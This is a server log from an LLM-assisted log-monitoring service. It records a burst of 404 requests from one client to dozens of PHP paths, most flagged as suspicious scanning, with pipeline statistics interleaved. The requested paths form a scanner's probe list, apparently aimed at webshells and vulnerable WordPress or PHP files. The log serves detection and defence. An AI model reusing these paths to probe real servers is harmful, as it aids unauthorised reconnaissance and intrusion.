classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:57:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:12.327000 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on a PHP file path (55b76.php) can indicate probing or attempted access to potentially vulnerable scripts. 
Line=2026-03-20T12:46:08.734529684Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /55b76.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:19.947744 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:57:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:19.947789 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a potential admin path (admin-footer.php) returning 404 suggests probing for admin endpoints. Not definitively malicious but warrants scrutiny. Line=2026-03-20T12:46:08.800692680Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /admin-footer.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:30.183792 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.60 action=allow pattern_type=prefix Mar 20 12:57:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:30.183829 [analyzer] Source hint mismatch: LLM says "nginx/apache access log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:31.935556 [observer] Pipeline: processed=5396 pattern_hits=5186 llm_calls=210 llm_errors=3 learned=3 Mar 20 12:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:31.935579 [observer] Patterns: hash=5186 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=210 Mar 20 12:57:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:34.353348 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:57:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:34.353388 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp 
Reason=HTTP GET to a likely probe path (ccs.php) returning 404 could indicate scripted scanning or probing activity. Line=2026-03-20T12:46:08.933007933Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /ccs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:39.555857 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:57:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:39.555888 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request to a PHP file returning 404 can indicate probing for resources or misconfigured assets; not definitively malicious but warrants monitoring. Line=2026-03-20T12:46:08.999329412Z 10.0.1.9 - - [20/Mar/2026:12:46:08 +0000] "GET /ws83.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:45.176916 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type= Mar 20 12:57:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:45.176950 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Unusual access to inputs.php resulting in 404 may indicate probing for vulnerable PHP endpoints; pattern not anchored, but notable due to the requested path. 
Line=2026-03-20T12:46:09.235608274Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /inputs.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:57:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:51.888940 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 12:57:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:51.888982 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:57:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:58.208904 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:57:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:57:58.208941 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file path from an external client can indicate probing or automated vulnerability scans. Line=2026-03-20T12:46:09.368371007Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /a5e0a.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.739196 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.739233 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for /lib.php with external IP in request pattern commonly seen in probing or vulnerability scans. 
Line=2026-03-20T12:46:09.434585616Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /lib.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.956761 [observer] Pipeline: processed=5406 pattern_hits=5190 llm_calls=216 llm_errors=3 learned=3 Mar 20 12:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:01.956794 [observer] Patterns: hash=5190 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=216 Mar 20 12:58:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:06.485096 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 12:58:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:06.485313 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to gfd.php returning 404 suggests probing for vulnerable PHP file paths. Could be scanner activity. Line=2026-03-20T12:46:09.500627318Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /gfd.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:11.829608 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:58:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:11.829651 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:58:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:16.724542 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.55 action=alert pattern_type= Mar 20 12:58:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:16.724583 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 response for a common PHP file (domains.php) could indicate probing 
or misconfiguration; not clearly malicious but warrants monitoring. Line=2026-03-20T12:46:09.674332333Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /domains.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:21.487125 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:58:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:21.487183 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a potentially probing path (byypas.php) from an external IP; unusual access pattern but not definitive malicious activity yet. Line=2026-03-20T12:46:09.740851342Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /byypas.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:26.812200 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:58:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:26.812238 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Detected an HTTP GET request for install.php returning 404, which is commonly used in vulnerability and install probing attempts against web servers. 
Line=2026-03-20T12:46:09.886349991Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /install.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:30.933748 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type= Mar 20 12:58:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:30.933801 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file could indicate probing for common sensitive files; not definitive but warrants monitoring. Line=2026-03-20T12:46:09.976478150Z 10.0.1.9 - - [20/Mar/2026:12:46:09 +0000] "GET /myfile.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:31.936113 [observer] Pipeline: processed=5414 pattern_hits=5192 llm_calls=222 llm_errors=3 learned=3 Mar 20 12:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:31.936140 [observer] Patterns: hash=5192 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=222 Mar 20 12:58:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:35.750463 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:58:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:35.750499 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a PHP file probe (grsiuk.php) can indicate scanning for vulnerable PHP scripts; not confirmed malicious but warrants alerting. 
Line=2026-03-20T12:46:10.086061173Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /grsiuk.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:42.937665 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:58:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:42.937703 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET to wp-*.php with 404 suggests probing for WordPress file; external IP present, potential automated scanning. Line=2026-03-20T12:46:10.153072813Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /wp-p2r3q9c8k4.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:46.488485 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.60 action=alert pattern_type= Mar 20 12:58:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:46.488521 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 for wp-access.php could indicate a probing attempt for WordPress admin paths. Line=2026-03-20T12:46:10.234829876Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /wp-access.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:53.899712 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:58:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:53.899749 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a likely unusual path (/inege.php) can indicate probing for mis-typed or sensitive files. 
Line=2026-03-20T12:46:10.301643556Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /inege.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:58:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:58.532370 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:58:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:58:58.532420 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=GET request for a PHP file that does not exist (404) from external IP, indicating a potential probe or automated scanning. Line=2026-03-20T12:46:10.367856438Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /bgymj.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:01.987853 [observer] Pipeline: processed=5423 pattern_hits=5196 llm_calls=227 llm_errors=3 learned=3 Mar 20 12:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:01.987886 [observer] Patterns: hash=5196 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=227 Mar 20 12:59:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:05.706992 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:59:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:05.707030 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request for a random PHP file returning 404 from a client IP suggests a potential probe or scan activity. 
Line=2026-03-20T12:46:10.435072832Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /6kDPjgFTmvS.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:10.543514 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.58 action=alert pattern_type= Mar 20 12:59:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:10.543552 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for an unusual PHP file path from a private IP with an external client IP present in logs suggests automated probing Line=2026-03-20T12:46:10.518871147Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /tx78.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:15.944279 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 12:59:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:15.944316 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 on /init.php with external IP in log suggests probing for initialization or default PHP file commonly targeted during scans Line=2026-03-20T12:46:10.586238395Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /init.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:20.244749 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:59:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:20.244782 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a php endpoint (ws49.php) from an internal IP; could be probing or misconfigured route; not definitive malicious but warrants attention. 
Line=2026-03-20T12:46:10.701972900Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /ws49.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:24.468374 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:59:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:24.468410 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to a PHP file that returns 404 may indicate a probing or attempted discovery of insecure resources. Line=2026-03-20T12:46:10.768769796Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /56c53.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:31.936283 [observer] Pipeline: processed=5430 pattern_hits=5198 llm_calls=232 llm_errors=3 learned=3 Mar 20 12:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:31.936305 [observer] Patterns: hash=5198 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=232 Mar 20 12:59:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:32.653841 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=regex Mar 20 12:59:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:32.653881 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:59:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:36.920533 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 12:59:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:36.920582 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for a direct PHP file (/144.php) from a client IP; 
could indicate probing or automated scanning. Line=2026-03-20T12:46:10.900529734Z 10.0.1.9 - - [20/Mar/2026:12:46:10 +0000] "GET /144.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:41.724821 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 12:59:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:41.724860 [analyzer] Source hint mismatch: LLM says "httpd", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:59:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:46.701586 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 12:59:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:46.701623 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=404 for motu.php suggests probing for a potentially sensitive PHP file commonly targeted in site enumeration or vulnerability scans. Not definitive malicious activity, but warrants alerting and monitoring. Line=2026-03-20T12:46:11.058259574Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /motu.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:51.964786 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.55 action=alert pattern_type= Mar 20 12:59:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:51.964823 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=HTTP 404 for an AJAX PHP endpoint (/ajax.php) from an external IP in logs can indicate probing for common web vulnerabilities. 
Line=2026-03-20T12:46:11.139292074Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /ajax.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 12:59:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:57.882674 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 12:59:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:59:57.882710 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /maul.php returning 404 suggests probing for PHP files; pattern is common in web vulnerability scans. Not confirmed malicious, but warrants alert. Line=2026-03-20T12:46:11.234575131Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /maul.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 13:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:01.959859 [observer] Pipeline: processed=5438 pattern_hits=5200 llm_calls=238 llm_errors=3 learned=3 Mar 20 13:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:01.959893 [observer] Patterns: hash=5200 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=238 Mar 20 13:00:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:02.978799 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:00:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:02.978837 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to wp-blog.php with 404 status is a common probe for WordPress disclosures; involves external IPs and a precise timestamp, indicating potential automated scanning. 
Line=2026-03-20T12:46:11.426150021Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /public/wp-blog.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 13:00:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:13.016531 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:00:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:13.016575 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=A GET request to wp-content/radio.php returning 404 suggests probing for vulnerable script(s). This pattern is common in vulnerability scans. Line=2026-03-20T12:46:11.491987896Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /wp-content/radio.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 13:00:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:23.667031 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 13:00:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:23.667077 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 13:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:31.940612 [observer] Pipeline: processed=5445 pattern_hits=5204 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:31.940638 [observer] Patterns: hash=5204 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:00:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:33.647025 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 13:00:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:00:33.647062 [SUSPICIOUS] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Access to /166.php returning 404 suggests probing for PHP file 
presence; combined with cross-origin IP in log may indicate automated scanning. Line=2026-03-20T12:46:11.625107271Z 10.0.1.9 - - [20/Mar/2026:12:46:11 +0000] "GET /166.php HTTP/1.0" 404 146 "-" "-" "4.204.200.32" Mar 20 13:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:01.980138 [observer] Pipeline: processed=5449 pattern_hits=5208 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:01.980291 [observer] Patterns: hash=5208 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:31.935228 [observer] Pipeline: processed=5455 pattern_hits=5214 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:01:31.935251 [observer] Patterns: hash=5214 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:01.948382 [observer] Pipeline: processed=5457 pattern_hits=5216 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:01.948407 [observer] Patterns: hash=5216 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:31.936498 [observer] Pipeline: processed=5461 pattern_hits=5220 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:02:31.936526 [observer] Patterns: hash=5220 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:01.941832 [observer] Pipeline: processed=5463 pattern_hits=5222 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:01.941865 [observer] Patterns: hash=5222 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:03:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 13:03:31.951341 [observer] Pipeline: processed=5465 pattern_hits=5224 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:03:31.951367 [observer] Patterns: hash=5224 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:01.966351 [observer] Pipeline: processed=5469 pattern_hits=5228 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:01.966382 [observer] Patterns: hash=5228 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:31.936610 [observer] Pipeline: processed=5471 pattern_hits=5230 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:04:31.936638 [observer] Patterns: hash=5230 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:01.989842 [observer] Pipeline: processed=5475 pattern_hits=5234 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:01.989871 [observer] Patterns: hash=5234 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 Mar 20 13:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:31.946540 [observer] Pipeline: processed=5477 pattern_hits=5236 llm_calls=241 llm_errors=3 learned=3 Mar 20 13:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:05:31.946567 [observer] Patterns: hash=5236 prefix=0 regex=0 contains=0 deny=24 alert=431 suppress=0 misses=241 